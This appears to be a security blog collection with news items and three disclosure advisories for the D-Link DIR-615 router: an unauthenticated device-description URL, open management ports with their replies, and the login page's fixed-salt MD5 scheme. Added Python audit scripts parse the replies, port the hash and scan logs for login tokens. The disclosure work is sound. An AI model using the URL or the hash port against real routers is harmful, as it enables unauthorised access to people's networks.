Until now there hasn’t been a rootkit which explicitly attacks machines running a 64-bit version of Microsoft Windows. But now the TDL3 rootkit has been updated to infect Windows Vista 64 bit and Windows 7 64 bit.
Read the full story here.
Dr. Ali Jahangiri
Since its discovery a few months ago, the purpose and intention of the Stuxnet worm has remained shrouded in mystery. This Windows based worm is the first ever malware designed to attack industrial equipment.
Specifically it targets Siemens’ Supervisory Control And Data Acquisition (SCADA) software used to control and monitor industrial processes and has the ability to reprogram Siemens’ Simatic PLCs (programmable logic controllers).
PLCs contain code to control automated industrial systems in manufacturing plants or factories. Programmers use the Siemens’ software from a Windows PC to create code and then upload their code to the PLCs. The Stuxnet worm infects the PCs and then uploads its own code to the PLC.
Read the full story here.
Overview:
General device configuration and information such as UDN, services, service ID, Control URL and other detailed information from a D-Link DIR-615 Wireless N 300 router can be accessed by fetching root.sxml using a web browser.
Description:
Attacker can gain remote access to the D-Link DIR-615 Wireless N 300 router, general device information and configuration by fetching root.sxml file.
Exploit Syntax: http://deviceIP/root.sxml
Exploit Output for device with IP 192.168.150.1:
<root>
  <specVersion>
    <major>1</major>
    <minor>0</minor>
  </specVersion>
  <URLBase>http://192.168.150.1</URLBase>
  <device>
    <deviceType>urn:schemas-upnp-org:device:InternetGatewayDevice:1</deviceType>
    <presentationURL>/</presentationURL>
    <friendlyName>Wireless N Router</friendlyName>
    <manufacturer>D-Link Systems</manufacturer>
    <manufacturerURL>http://www.dlink.com</manufacturerURL>
    <modelDescription>Wireless N Router</modelDescription>
    <modelName>Wireless N Router</modelName>
    <modelNumber>DIR-615</modelNumber>
    <modelURL>http://www.dlink.com</modelURL>
    <serialNumber>none</serialNumber>
    <UDN>uuid:280BA93F-BC7B-336E-8F78-733C78667090</UDN>
    <UPC>00000-00001</UPC>
    <serviceList>
      <service>
        <serviceType>urn:schemas-upnp-org:service:Layer3Forwarding:1</serviceType>
        <serviceId>urn:upnp-org:serviceId:L3Forwarding1</serviceId>
        <controlURL>http://192.168.150.1:4444/l3fw</controlURL>
        <eventSubURL>http://192.168.150.1:9393/l3fw</eventSubURL>
        <SCPDURL>http://192.168.150.1/l3fw.xml</SCPDURL>
      </service>
    </serviceList>
    <deviceList>
      <device>
        <deviceType>urn:schemas-upnp-org:device:WANDevice:1</deviceType>
        <friendlyName>Wireless N Router</friendlyName>
        <manufacturer>D-Link Systems</manufacturer>
        <manufacturerURL>http://www.dlink.com</manufacturerURL>
        <modelDescription>Wireless N Router</modelDescription>
        <modelName>Wireless N Router</modelName>
        <modelNumber>DIR-615</modelNumber>
        <modelURL>http://www.dlink.com</modelURL>
        <serialNumber>none</serialNumber>
        <UDN>uuid:616CA787-7B12-39B7-836B-9DDF50280572</UDN>
        <UPC>00000-00001</UPC>
        <serviceList>
          <service>
            <serviceType>urn:schemas-upnp-org:service:WANCommonInterfaceConfig:1</serviceType>
            <serviceId>urn:upnp-org:serviceId:WANCommonIFC1</serviceId>
            <controlURL>http://192.168.150.1:4444/wcommifc</controlURL>
            <eventSubURL>http://192.168.150.1:9393/wcommifc</eventSubURL>
            <SCPDURL>http://192.168.150.1/WANCommonIFC1.xml</SCPDURL>
          </service>
        </serviceList>
        <deviceList>
          <device>
            <deviceType>urn:schemas-upnp-org:device:WANConnectionDevice:1</deviceType>
            <friendlyName>Wireless N Router</friendlyName>
            <manufacturer>D-Link Systems</manufacturer>
            <manufacturerURL>http://www.dlink.com</manufacturerURL>
            <modelDescription>Wireless N Router</modelDescription>
            <modelName>Wireless N Router</modelName>
            <modelNumber>DIR-615</modelNumber>
            <modelURL>http://www.dlink.com</modelURL>
            <serialNumber>none</serialNumber>
            <UDN>uuid:C730E975-C618-3CC8-A0D8-92913DD5EC5E</UDN>
            <UPC>00000-00001</UPC>
            <serviceList>
              <service>
                <serviceType>urn:schemas-upnp-org:service:WANIPConnection:1</serviceType>
                <serviceId>urn:upnp-org:serviceId:WANIPConn1</serviceId>
                <controlURL>http://192.168.150.1:4444/wipconn</controlURL>
                <eventSubURL>http://192.168.150.1:9393/wipconn</eventSubURL>
                <SCPDURL>http://192.168.150.1/WANIPConn1.xml</SCPDURL>
              </service>
            </serviceList>
          </device>
        </deviceList>
      </device>
      <device>
        <deviceType>urn:schemas-wifialliance-org:device:WFADevice:1</deviceType>
        <presentationURL>/</presentationURL>
        <friendlyName>WFADevice</friendlyName>
        <manufacturer>D-Link Systems</manufacturer>
        <manufacturerURL>http://www.dlink.com</manufacturerURL>
        <modelDescription>Wireless N Router</modelDescription>
        <modelName>Wireless N Router</modelName>
        <modelNumber>DIR-615</modelNumber>
        <modelURL>http://www.dlink.com</modelURL>
        <serialNumber>none</serialNumber>
        <UDN>uuid:5B0240B4-5042-3757-A05A-51DBD8DF789E</UDN>
        <UPC>00000-00001</UPC>
        <serviceList>
          <service>
            <serviceType>urn:schemas-wifialliance-org:service:WFAWLANConfig:1</serviceType>
            <serviceId>urn:wifialliance-org:serviceId:WFAWLANConfig1</serviceId>
            <controlURL>http://192.168.150.1:8832/wfawc</controlURL>
            <eventSubURL>http://192.168.150.1:8456/wfawc</eventSubURL>
            <SCPDURL>http://192.168.150.1/WFAwc.xml</SCPDURL>
          </service>
        </serviceList>
      </device>
    </deviceList>
  </device>
</root>
Impact:
Important device information and general configuration will be revealed without proper authorization.
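The device description above is a tree of embedded devices, each carrying its own UDN and a list of services whose controlURL and eventSubURL point at the router's management ports. The script below is an added example, not part of the advisory or of any D-Link software: it flattens such a description into one row per service and lists every TCP port the description directs clients to, which is the inventory an auditor wants before deciding what should be reachable from where. The sample XML is a trimmed, constructed copy of the root.sxml shown above (UDNs and URLs as in the advisory, descriptive fields omitted); the parser matches element names without regard to namespace so it also works on descriptions that declare the UPnP xmlns.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Constructed sample: trimmed copy of the root.sxml shown above.
SAMPLE_ROOT_SXML = """<root>
  <URLBase>http://192.168.150.1</URLBase>
  <device>
    <deviceType>urn:schemas-upnp-org:device:InternetGatewayDevice:1</deviceType>
    <UDN>uuid:280BA93F-BC7B-336E-8F78-733C78667090</UDN>
    <serviceList><service>
      <serviceId>urn:upnp-org:serviceId:L3Forwarding1</serviceId>
      <controlURL>http://192.168.150.1:4444/l3fw</controlURL>
      <eventSubURL>http://192.168.150.1:9393/l3fw</eventSubURL>
    </service></serviceList>
    <deviceList>
      <device>
        <deviceType>urn:schemas-upnp-org:device:WANDevice:1</deviceType>
        <UDN>uuid:616CA787-7B12-39B7-836B-9DDF50280572</UDN>
        <serviceList><service>
          <serviceId>urn:upnp-org:serviceId:WANCommonIFC1</serviceId>
          <controlURL>http://192.168.150.1:4444/wcommifc</controlURL>
          <eventSubURL>http://192.168.150.1:9393/wcommifc</eventSubURL>
        </service></serviceList>
        <deviceList><device>
          <deviceType>urn:schemas-upnp-org:device:WANConnectionDevice:1</deviceType>
          <UDN>uuid:C730E975-C618-3CC8-A0D8-92913DD5EC5E</UDN>
          <serviceList><service>
            <serviceId>urn:upnp-org:serviceId:WANIPConn1</serviceId>
            <controlURL>http://192.168.150.1:4444/wipconn</controlURL>
            <eventSubURL>http://192.168.150.1:9393/wipconn</eventSubURL>
          </service></serviceList>
        </device></deviceList>
      </device>
      <device>
        <deviceType>urn:schemas-wifialliance-org:device:WFADevice:1</deviceType>
        <UDN>uuid:5B0240B4-5042-3757-A05A-51DBD8DF789E</UDN>
        <serviceList><service>
          <serviceId>urn:wifialliance-org:serviceId:WFAWLANConfig1</serviceId>
          <controlURL>http://192.168.150.1:8832/wfawc</controlURL>
          <eventSubURL>http://192.168.150.1:8456/wfawc</eventSubURL>
        </service></serviceList>
      </device>
    </deviceList>
  </device>
</root>"""


def _local(tag):
    """Strip an XML namespace, if present, so matching works with or without xmlns."""
    return tag.rsplit("}", 1)[-1]


def _children(elem, name):
    return [c for c in elem if _local(c.tag) == name]


def _text(elem, name):
    kids = _children(elem, name)
    return kids[0].text.strip() if kids and kids[0].text else ""


def walk_devices(device):
    """Yield a device and then, depth-first, every device embedded in its deviceList."""
    yield device
    for dev_list in _children(device, "deviceList"):
        for child in _children(dev_list, "device"):
            yield from walk_devices(child)


def inventory(xml_text):
    """Flatten a UPnP device description into one row per advertised service."""
    root = ET.fromstring(xml_text)
    rows = []
    for top in _children(root, "device"):
        for dev in walk_devices(top):
            for svc_list in _children(dev, "serviceList"):
                for svc in _children(svc_list, "service"):
                    rows.append({
                        "udn": _text(dev, "UDN"),
                        "deviceType": _text(dev, "deviceType"),
                        "serviceId": _text(svc, "serviceId"),
                        "controlURL": _text(svc, "controlURL"),
                        "eventSubURL": _text(svc, "eventSubURL"),
                    })
    return rows


def listening_ports(rows):
    """TCP ports that the controlURL and eventSubURL entries direct clients to."""
    ports = set()
    for row in rows:
        for key in ("controlURL", "eventSubURL"):
            parsed = urlparse(row[key])
            if parsed.hostname:
                ports.add(parsed.port or 80)
    return sorted(ports)


if __name__ == "__main__":
    rows = inventory(SAMPLE_ROOT_SXML)
    for row in rows:
        print(f"{row['udn']}  {row['serviceId']}  control={row['controlURL']}")
    print("ports referenced by the description:", listening_ports(rows))
```

Run against the sample, the port list is 4444, 8456, 8832 and 9393; port 8099 does not appear because it carries the HNAP service covered by the next advisory rather than a UPnP control point. The useful follow-up check is whether each listed port answers only on the LAN interface.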
Solution:
I am currently unaware of a solution to this problem.
Vendor Information:
http://www.dlink.com/products/?pid=565
Product Details:
D-Link Wireless access point
Product Page DIR-615
Hardware Version: B2
Firmware Version: 2.25
CERT(R) Coordination Center Tracking Code: VU#944927 Date: 01/10/2010
Overview:
TCP ports 4444, 8099, 8456, 8832 and 9393 are open in D-Link DIR-615 Wireless N 300 router. The above mentioned ports could be used for a remote connection by HTTP or Telnet protocols.
Description:
TCP ports 4444, 8099, 8456, 8832 and 9393 are open in D-Link DIR-615 Wireless N 300 router.
TCP 4444: A remote connection attempt to this port returns the following reply from the device that appears to be in XML format:
<soap:Envelope soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <soap:Body>
    <soap:Fault>
      <faultcode>s:Client</faultcode>
      <faultstring>UPnPError</faultstring>
      <detail>
        <UPnPError>
          <errorCode>500</errorCode>
          <errorDescription>Invalid Action</errorDescription>
        </UPnPError>
      </detail>
    </soap:Fault>
  </soap:Body>
</soap:Envelope>
This port has been registered with IANA for krb524.
TCP 8099: A remote connection attempt to this port returns the following reply from the device, which appears to be in XML format and contains the device settings:
<soap:Envelope soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <soap:Body>
    <GetDeviceSettingsResponse>
      <GetDeviceSettingsResult>OK</GetDeviceSettingsResult>
      <Type>GatewayWithWiFi</Type>
      <DeviceName>D-Link Systems DIR-615</DeviceName>
      <VendorName>D-Link Systems</VendorName>
      <ModelDescription>Wireless N Router</ModelDescription>
      <ModelName>DIR-615 B2</ModelName>
      <FirmwareVersion>2.25, 2008/05/16</FirmwareVersion>
      <PresentationURL>/Status/Device_Info.shtml</PresentationURL>
      <SOAPActions>
        <string>http://purenetworks.com/HNAP1/GetDeviceSettings</string>
        <string>http://purenetworks.com/HNAP1/SetDeviceSettings</string>
        <string>http://purenetworks.com/HNAP1/GetWanSettings</string>
        <string>http://purenetworks.com/HNAP1/SetWanSettings</string>
        <string>http://purenetworks.com/HNAP1/GetWanStatus</string>
        <string>http://purenetworks.com/HNAP1/RestoreFactoryDefaults</string>
        <string>http://purenetworks.com/HNAP1/IsDeviceReady</string>
        <string>http://purenetworks.com/HNAP1/Reboot</string>
        <string>http://purenetworks.com/HNAP1/AddPortMapping</string>
        <string>http://purenetworks.com/HNAP1/DeletePortMapping</string>
        <string>http://purenetworks.com/HNAP1/GetPortMappings</string>
        <string>http://purenetworks.com/HNAP1/GetMACFilters2</string>
        <string>http://purenetworks.com/HNAP1/SetMACFilters2</string>
        <string>http://purenetworks.com/HNAP1/GetRouterLanSettings</string>
        <string>http://purenetworks.com/HNAP1/SetRouterLanSettings</string>
        <string>http://purenetworks.com/HNAP1/GetConnectedDevices</string>
        <string>http://purenetworks.com/HNAP1/GetNetworkStats</string>
        <string>http://purenetworks.com/HNAP1/GetWLanSettings24</string>
        <string>http://purenetworks.com/HNAP1/SetWLanSettings24</string>
        <string>http://purenetworks.com/HNAP1/GetWLanSecurity</string>
        <string>http://purenetworks.com/HNAP1/SetWLanSecurity</string>
      </SOAPActions>
      <SubDeviceURLs/>
      <Tasks>
        <TaskExtension>
          <Name>Wireless Settings</Name>
          <URL>/Basic/Wireless.shtml</URL>
          <Type>Browser</Type>
        </TaskExtension>
        <TaskExtension>
          <Name>Block Network Access</Name>
          <URL>/Advanced/MAC_Address_Filter.shtml</URL>
          <Type>Browser</Type>
        </TaskExtension>
        <TaskExtension>
          <Name>Parental Controls</Name>
          <URL>/Advanced/Access_Control.shtml</URL>
          <Type>Browser</Type>
        </TaskExtension>
        <TaskExtension>
          <Name>D-Link Tech Support</Name>
          <URL>http://support.dlink.com/products/view.asp?productid=DIR%2D635</URL>
          <Type>Browser</Type>
        </TaskExtension>
        <TaskExtension>
          <Name>Reboot Router</Name>
          <URL>/Tools/System.shtml</URL>
          <Type>Silent</Type>
        </TaskExtension>
      </Tasks>
    </GetDeviceSettingsResponse>
  </soap:Body>
</soap:Envelope>
This port has not been registered with IANA.
TCP 8456: A remote connection attempt with telnet to this port returns the following error after a successful connection:
HTTP/1.1 501 Internal Server Error
SERVER: ipOS/7.4 UPnP/1.0 ipGENADevice/1.0
HTTP/1.1 500 Server Error
This port has not been registered with IANA.
TCP 8832: A remote connection attempt by telnet to this port returns the following error after a successful connection:
HTTP/1.1 500 Server Error
This port has not been registered with IANA.
TCP 9393: A remote connection attempt by telnet to this port returns the following error after a successful connection:
HTTP/1.1 501 Internal Server Error
SERVER: ipOS/7.4 UPnP/1.0 ipGENADevice/1.0
HTTP/1.1 500 Server Error
This port has not been registered with IANA.
Impact:
The above mentioned ports provide remote access to an attacker and reveal technical information about the device and its configuration. Further, ports 8456, 8832 and 9393 could be used for a denial of service attack.
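The port 8099 reply is a plain inventory of what the HNAP interface offers, and about half of the listed actions change device state (every Set*, plus Reboot, RestoreFactoryDefaults and the port-mapping calls). The script below is an added example, not part of the advisory or of D-Link's software: it parses such a GetDeviceSettingsResponse, extracts the device identification fields, and sorts the advertised actions into read-only and state-changing sets so a reviewer knows exactly which calls to test for an authentication requirement. The classification by name prefix is an assumption of this example; the advisory itself only shows that the list is returned, not whether any action runs without credentials. The sample is constructed from the reply above with the soap namespace declaration added so it parses (the advisory's copy omits it).

```python
import xml.etree.ElementTree as ET

# Constructed sample: trimmed from the port 8099 reply shown above. The xmlns:soap
# declaration is added here so the document parses as XML.
SAMPLE_HNAP_RESPONSE = """<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
                soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <soap:Body>
    <GetDeviceSettingsResponse>
      <GetDeviceSettingsResult>OK</GetDeviceSettingsResult>
      <DeviceName>D-Link Systems DIR-615</DeviceName>
      <ModelName>DIR-615 B2</ModelName>
      <FirmwareVersion>2.25, 2008/05/16</FirmwareVersion>
      <SOAPActions>
        <string>http://purenetworks.com/HNAP1/GetDeviceSettings</string>
        <string>http://purenetworks.com/HNAP1/SetDeviceSettings</string>
        <string>http://purenetworks.com/HNAP1/GetWanSettings</string>
        <string>http://purenetworks.com/HNAP1/SetWanSettings</string>
        <string>http://purenetworks.com/HNAP1/GetWanStatus</string>
        <string>http://purenetworks.com/HNAP1/RestoreFactoryDefaults</string>
        <string>http://purenetworks.com/HNAP1/IsDeviceReady</string>
        <string>http://purenetworks.com/HNAP1/Reboot</string>
        <string>http://purenetworks.com/HNAP1/AddPortMapping</string>
        <string>http://purenetworks.com/HNAP1/DeletePortMapping</string>
        <string>http://purenetworks.com/HNAP1/GetPortMappings</string>
        <string>http://purenetworks.com/HNAP1/GetMACFilters2</string>
        <string>http://purenetworks.com/HNAP1/SetMACFilters2</string>
        <string>http://purenetworks.com/HNAP1/GetRouterLanSettings</string>
        <string>http://purenetworks.com/HNAP1/SetRouterLanSettings</string>
        <string>http://purenetworks.com/HNAP1/GetConnectedDevices</string>
        <string>http://purenetworks.com/HNAP1/GetNetworkStats</string>
        <string>http://purenetworks.com/HNAP1/GetWLanSettings24</string>
        <string>http://purenetworks.com/HNAP1/SetWLanSettings24</string>
        <string>http://purenetworks.com/HNAP1/GetWLanSecurity</string>
        <string>http://purenetworks.com/HNAP1/SetWLanSecurity</string>
      </SOAPActions>
    </GetDeviceSettingsResponse>
  </soap:Body>
</soap:Envelope>"""

# Name prefixes treated as state-changing. This is an assumption of the example,
# made from the action names alone.
STATE_CHANGING_PREFIXES = ("Set", "Add", "Delete", "Reboot", "RestoreFactoryDefaults")


def _local(tag):
    """Strip an XML namespace, if present, so matching works with or without xmlns."""
    return tag.rsplit("}", 1)[-1]


def parse_device_settings(xml_text):
    """Pull identification fields and the advertised SOAP action URLs out of the reply."""
    root = ET.fromstring(xml_text)
    info = {"actions": []}
    for el in root.iter():
        name = _local(el.tag)
        if name in ("DeviceName", "ModelName", "FirmwareVersion") and el.text:
            info[name] = el.text.strip()
        elif name == "string" and el.text:
            info["actions"].append(el.text.strip())
    return info


def classify_actions(action_urls):
    """Split action URLs into read-only and state-changing buckets by their last path segment."""
    buckets = {"read_only": [], "state_changing": []}
    for url in action_urls:
        name = url.rsplit("/", 1)[-1]
        key = "state_changing" if name.startswith(STATE_CHANGING_PREFIXES) else "read_only"
        buckets[key].append(name)
    return buckets


def triage(xml_text):
    """Summarise what the reply reveals and which actions still need an authentication check."""
    info = parse_device_settings(xml_text)
    buckets = classify_actions(info["actions"])
    return {
        "device": f"{info.get('DeviceName', '?')} ({info.get('ModelName', '?')}), "
                  f"firmware {info.get('FirmwareVersion', '?')}",
        "read_only": buckets["read_only"],
        "state_changing": buckets["state_changing"],
        # Each state-changing action is one item on the reviewer's list to verify.
        "needs_auth_check": len(buckets["state_changing"]),
    }


if __name__ == "__main__":
    result = triage(SAMPLE_HNAP_RESPONSE)
    print(result["device"])
    print("read-only actions:     ", ", ".join(result["read_only"]))
    print("state-changing actions:", ", ".join(result["state_changing"]))
```

On the sample the reply identifies the model and exact firmware build and advertises 10 state-changing and 11 read-only actions; the firmware string alone is what makes the banner useful for anyone matching devices against known issues, which is why the advisory rates the disclosure as an impact in its own right.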
Solution:
I am currently unaware of a solution to this problem.
Vendor Information:
http://www.dlink.com/products/?pid=565
Product Details:
D-Link Wireless access point
Product Page DIR-615
Hardware Version: B2
Firmware Version: 2.25
CERT(R) Coordination Center Tracking Code: VU#944927 Date: 01/10/2010
Overview
The D-Link DIR-615 console login page contains the full details of the security mechanism used to protect the user name and password during login.
Description
The D-Link DIR-615 Wireless N 300 router uses JavaScript in its console login page to implement a series of measures intended to avoid sending the user name and password in clear text. It salts the user's password with the fixed 8-character salt string "2bcfc20f": the password is truncated or padded to 16 characters, appended to the salt, and the result is padded further to 63 characters. Finally, it appends a "U" for a user login or "\x01" for an admin login, computes the MD5 hash of the result, and sends the salt concatenated with that hash to the server.
Code
<!-- InstanceBeginEditable -->
<script src="/md5.js"></script>
<script>
//<![CDATA[
function page_load()
{
    /* Detect browsers that cannot handle XML methods. */
    if (!document.getElementsByTagName || !((document.implementation && document.implementation.createDocument) || window.ActiveXObject)) {
        alert ("Your web browser is too old to use this web site. Please upgrade your browser.");
        return;
    }
    /* For debugging on a local client. */
    if ("" != "") {
        hide_all_ssi_tr();
    }
    document.forms.myform.password.focus();
}
function data_ready(xml)
{
    var status = xml.getElementData("login");
    if (status) {
        if (status == "timeout") {
            alert("Session timeout, please try again.");
            location.replace ('/');
        } else if (status == "error") {
            alert("Invalid password, please try again.");
            location.replace ('/');
        } else {
            location.replace ('/' + status);
        }
    }
}
function data_timeout()
{
    /* We did not get a reply from the server, the connection is likely down. */
    alert ("The network connection seems to be down. Press 'Ok' to try again.");
    location.reload(true);
}
function send_login()
{
    /* Salt in hex, 8 chars long. */
    var salt = "2bcfc20f";
    var password = document.forms.myform.password.value.substr(0,16);
    document.forms.myform.password.value = ""; // Make sure password never gets sent as clear text
    /* Pad the password to 16 chars. */
    for (var i = password.length; i < 16; i++) {
        password += String.fromCharCode(1);
    }
    /* Append the password to the salt and pad the result to 63 bytes. */
    var input = salt + password;
    for (var i = input.length; i < 63; i++) {
        input += String.fromCharCode(1);
    }
    /* Append a 'U' for user login, or a '\x01' for admin login. */
    input += (document.forms["myform"].username.value == 'user') ? 'U' : String.fromCharCode(1);
    /* MD5 hash of the salt. */
    var hash = hex_md5(input);
    /* Append the MD5 hash to the salt. */
    var login_hash = salt.concat(hash);
    /* Send the login hash to the server. */
    var xmlobj = new xmlDataObject(data_ready, data_timeout, 6000, "/post_login.xml?hash=" + login_hash);
    if (!xmlobj) {
        /* Browser does not support XML DOM. */
        alert ("Your web browser is too old to use this web site. Please upgrade your browser.");
        return;
    }
    xmlobj.retrieveData();
}
//]]>
</script>
<!-- InstanceEndEditable -->
Impact
Because this mechanism is implemented in client-side JavaScript, it is fully visible to anyone who can reach the login page. In addition, an attacker who intercepts a user's or admin's login request can apply the described mechanism to crack the password.
Solution
I am currently unaware of a solution to this problem. (Note: the device control panel does not support HTTPS.)
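To make the impact above concrete, the script below is an added example (not part of the advisory or of D-Link's code) that ports send_login() to Python and checks the properties a reviewer should note: the salt is a constant shared by every device, the transform contains no per-session nonce so the same password always yields the same token, and substr(0,16) means any two passwords that agree in their first 16 characters produce the same token. The last part scans a constructed proxy-style access log for /post_login.xml?hash= requests: since the token travels in the URL query string over plain HTTP, every proxy or web log on the path stores it. The port assumes an ASCII password, since the page's hex_md5() hashes one byte per character; the log lines and the client addresses in them are made up for this example.

```python
import hashlib
import re

SALT = "2bcfc20f"   # fixed salt hard-coded in the DIR-615 login page (from the advisory)


def dir615_login_hash(password: str, username: str) -> str:
    """Python port of send_login() from the device login page shown above.

    Assumes an ASCII password (hex_md5 in the page hashes one byte per character).
    """
    pw = password[:16]                               # substr(0,16): extra characters are dropped
    pw += "\x01" * (16 - len(pw))                    # pad the password to 16 chars with \x01
    data = SALT + pw
    data += "\x01" * (63 - len(data))                # pad salt + password to 63 chars
    data += "U" if username == "user" else "\x01"    # role marker: 64 bytes in total
    return SALT + hashlib.md5(data.encode("latin-1")).hexdigest()


def truncation_collision(p1: str, p2: str) -> bool:
    """True when two different passwords yield the same token because only 16 chars count."""
    return p1 != p2 and dir615_login_hash(p1, "admin") == dir615_login_hash(p2, "admin")


def scheme_weaknesses(password: str) -> dict:
    """Properties of the transform that matter for a security review."""
    token = dir615_login_hash(password, "admin")
    return {
        "static_salt": token.startswith(SALT),                          # same salt on every device
        "no_nonce": token == dir615_login_hash(password, "admin"),      # identical token each login
        "role_is_one_byte": dir615_login_hash(password, "user") != token,
        "token_length": len(token),                                     # 8 hex salt + 32 hex MD5
    }


# A DIR-615 login request in an HTTP/proxy access log: the credential is in the URL.
LOGIN_RE = re.compile(r"GET /post_login\.xml\?hash=(2bcfc20f[0-9a-f]{32})")


def find_login_tokens(access_log: str):
    """Return (client, token) pairs for login requests recorded in a web/proxy log."""
    hits = []
    for line in access_log.splitlines():
        match = LOGIN_RE.search(line)
        if match:
            hits.append((line.split()[0], match.group(1)))
    return hits


# Constructed sample log: addresses and the password behind the token are made up.
SAMPLE_TOKEN = dir615_login_hash("demo-password", "admin")
SAMPLE_LOG = "\n".join([
    '10.0.0.24 - - [10/Jan/2010:12:00:01 +0000] "GET /Status/Device_Info.shtml HTTP/1.1" 200 456',
    f'10.0.0.23 - - [10/Jan/2010:12:00:05 +0000] "GET /post_login.xml?hash={SAMPLE_TOKEN} HTTP/1.1" 200 123',
    '10.0.0.24 - - [10/Jan/2010:12:00:09 +0000] "GET /md5.js HTTP/1.1" 200 9876',
])


if __name__ == "__main__":
    for name, value in scheme_weaknesses("demo-password").items():
        print(f"{name:18} {value}")
    print("truncation collision:", truncation_collision("abcdefghijklmnop", "abcdefghijklmnopQRST"))
    for client, token in find_login_tokens(SAMPLE_LOG):
        print(f"login token recorded in log from {client}: {token}")
```

The log scan is the detection side of the advisory: a token found in any log on the path is reusable as-is, so the practical mitigation is to treat such logs as credential stores and to keep the router's management interface off untrusted networks, since the page itself notes the control panel offers no HTTPS.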
http://www.dlink.com/products/?pid=565
Product Details:
D-Link Wireless access point
Product Page DIR-615
Hardware Version: B2
Firmware Version: 2.25
CERT(R) Coordination Center Tracking Code: VU#944927 Date: 01/10/2010
I am very excited to share with you the latest download figures for the Live Hacking 1.2 Linux distribution. I posted V1.2 less than one month ago and there have been a staggering 2,600 downloads (and rising).
For those of you that don't know, the Live Hacking CD is a Linux distribution packed with tools for ethical hacking and penetration testing. New in V1.2 is the Metasploit penetration testing framework and some new IPv6 tools.
The Live Hacking CD is a ‘Live CD’ that runs directly from the CD and doesn’t need to be installed on your hard-drive. Once booted you can use the included tools to perform penetration tests and ethically hack on your own network to ensure that it is secure from outside intruders. As well as the standard Linux networking tools the Live Hacking CD has tools for DNS enumeration and reconnaissance as well as utilities for foot-printing, password cracking and network sniffing. It also has programs for spoofing and a set of wireless networking utilities.
You can read more about the Live Hacking CD here:
Cybercrime Forensic investigation is a complicated science with its own history, implications and future. It is not sufficient merely to consider it a branch of criminology, or the study of cyber criminal behavior, or research into the relationship between the causes of tech related crime and social policies. For cyber criminals, their knowledge and their crimes are bound together. The possible suspects are rich in knowledge and technical skills. They have mastered the technology better than the technology’s creators, and they know how to use technology against technology.
A multidisciplinary approach is required to fully foresee the future of cybercrime forensics. It requires a team of specialists from different disciplines within the IT industry and related industrial and social segments such as telecom and law. However, in this article the author looks at the future of cybercrime forensics based on his knowledge and experience in this field.
Cybercrime Forensics for Governments
Cybercrime forensics at the governmental level will be more complicated in the future. Governments will need to turn more to their national security organisations to hunt down cyber criminals. In addition, they will need to invent anti-forensic tools and methods to keep their activities and information assets secret.
Cyberspace security and computer related technologies will be a real challenge for governments. The platforms and protocols for computer related technologies may have both domestic and international uses. Therefore, it will be difficult for governments to reach an agreement for international cyber security policies.
At the same time, some countries are the technology owners and this intellectual property ownership will give them an advantage compared to other countries without such a privilege. The technology ownership issue will force the other countries to utilise the open source platforms to develop their own customised operating systems and software.
Cybercrime Forensics for Corporates
Currently the cybercrime forensic markets have been dominated by a few companies. These are the pioneers in cybercrime forensics and analysis. They have the tools and the solutions for cyber forensic investigation. They train law enforcement agencies to use their tools and solutions and some of them even have special tools just for governmental use.
There are also many small companies with one or two consultant partners who are either retired law enforcement officers or former IT professionals from Fortune 500 companies. These people use their contacts and credentials to achieve some market share. However, in the future, cybercrime forensics at the corporate level will be diversified to education and certain specialties and products. It will be difficult for small companies to build a team with the right core competencies. In addition, due to security clearance requirements and national security interests, most of these companies will only practice in their country of origin.
Furthermore, information security standards such as ISO27001 and ITIL will be implemented more in medium to enterprise size companies. Realistically, only these companies can afford the cost of compliance implementation. Therefore, it will be necessary for them to have proper incident response procedures and the corresponding cyber forensic investigation capabilities. These companies may well have their own cyber forensic investigation units.
Cybercrime Forensics in Professional Institutions
Cybercrime forensics is a new battle ground for professional institutions. Currently, there is no real internationally recognised authority to govern cybercrime forensics practices, regulations and certification. Therefore, professional institutions are offering cybercrime forensic investigation training programs, certifications and conferences. Currently, some of these institutions are forming alliances (as trade and training partners) to achieve their sales targets. In the future, it is likely that these institutions will start to attack each other to gain market share.
Cybercrime Forensics in Universities
It is sad to note that more and more often information technology advances are coming from industry rather than universities. Within IT, a few companies dominate the industry and therefore the innovations. It will be the same for cybercrime forensics; the companies with market share have the money for research and development. The main issue with academic institutions is their approach, which is slow and traditional compared to the faster speed of development and implementation found in industry.
Furthermore, the training programs in universities are not aligned with the current job market and industry needs. The university students have a lack of practical knowledge compared to the IT professionals who are in the industry (and possibly without academic studies). This is the major reason why students choose further training to achieve professional certification and so distinguish themselves from other graduates.
Cybercrime Forensics in the Media
There will be more magazines, websites and blogs specialising in cybercrime forensics and analysis. They will be the voice of the industry with the power to review, promote and criticise books, products, solutions and training programs. They will sell advertising and help vendors sell their products. Whoever has more marketing budget and better relations will be the most successful in the cybercrime forensics industry. Nevertheless, there will be one or two magazines and websites that will remain independent, but they will find it difficult to survive in such a tough market.
Cybercrime Forensics and Technical Trends
The market will be divided into four main segments with specialised service providers for each segment. The segments are: Microsoft Windows related products, UNIX & Linux related products, Apple related products and computer network & telecom related products.
The solution providers will create more comprehensive tools and solutions to gain better market share. They will transform their solutions into a set of tools for non-IT professionals. They will also try to make their tools web based, for remote forensic investigations.
The open source community will be active on the UNIX & Linux platforms, working to secure the legislation required to accredit open source tools in the various countries and judicial systems.
Apple created a giant market for those who want to develop Apple device related tools and solutions. This will be a new era for the professionals who are working in cybercrime forensics.
Cloud computing, cellular networks, WiMax and virtualization will be the other areas of interest for study and product development. It is obvious that everything is merging towards IT and that cyberspace will play an important role in the near future. This will lead governments and authorities to pursue other methods of intelligence gathering, such as web and data mining, to protect their interests.
This will lead to the biggest privacy issue in history. All the data communication, of all users, will be logged at the carrier level. Then the authorities will use data mining tools to identify suspicious behavior of a particular user or users in their own or an allies’ territory. All this information will be saved in massive databases and then the commercial, financial and personal information, in addition to the communication records and social behaviors, will be linked together.
And this will ultimately lead to a new chapter in the history of cybercrime forensics, namely Applied Artificial Intelligence in Cybercrime Forensics.
I am pleased to announce an update to the Live Hacking CD. The updated Live CD contains the tools and utilities you need to test and hack your own network in the same way a malicious hacker would. New in this version is the Metasploit penetration testing framework and a range of IPv6 foot-printing tools.
The Live Hacking CD is a ‘Live CD’ meaning that it loads and runs directly from the CD and doesn’t need installing on your hard disk.
